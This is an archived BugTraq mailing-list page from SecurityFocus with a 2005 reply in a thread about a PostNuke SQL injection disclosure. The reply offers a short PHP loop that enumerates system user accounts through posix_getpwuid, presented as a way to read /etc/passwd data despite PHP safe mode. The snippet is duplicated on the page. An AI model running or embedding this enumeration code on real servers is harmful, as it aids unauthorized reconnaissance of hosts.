BugTraq
Back to list
|
Post reply
[SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1
Feb 28 2005 08:11PM
Maksymilian Arciemowicz (max jestsuper pl)
(1 replies)
Re: [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1
Mar 12 2005 02:37PM
Linux php (wassemgtk gmail com)
hi look
show to /etc/passwd
php.ini
safe_mod_php= on ;
or
safe_mod_php=off ;
code
-------------------------------------------
for($uid=0;$uid<60000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "<br>";
}
}
-------------------------------------------------------
show to /etc/passwd
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
show to /etc/passwd
php.ini
safe_mod_php= on ;
or
safe_mod_php=off ;
code
-------------------------------------------
for($uid=0;$uid<60000;$uid++){
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "<br>";
}
}
-------------------------------------------------------
show to /etc/passwd
[ reply ]